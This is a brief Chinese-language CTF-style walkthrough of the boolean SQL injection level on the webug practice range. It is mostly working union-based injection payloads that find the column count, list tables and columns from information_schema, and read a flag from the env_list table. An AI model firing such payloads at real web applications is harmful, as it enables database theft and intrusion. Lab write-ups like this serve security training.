webug--布尔注入

访问靶场:
webug--布尔注入_第1张图片
(1)判断注入点
输入id=1’有反应
webug--布尔注入_第2张图片(2)判断字段数
利用二分法,可以判断出字段数为2

id=1' order by 2 %23

webug--布尔注入_第3张图片(3)爆出当前数据库名

id=1' union select 1,database() %23

webug--布尔注入_第4张图片爆出数据库名为webug

(4)爆出当前数据库下的表

id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug'%23

webug--布尔注入_第5张图片
(5)查看env_list表里的列

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='env_list' and table_schema='webug'%23

webug--布尔注入_第6张图片
(6)查看列的内容

查看flag内容:' 1'union select 1,envFlag from env_list where id=2%23webug--布尔注入_第7张图片
得到flag为fdsafsdfa

你可能感兴趣的:(CTF,web安全)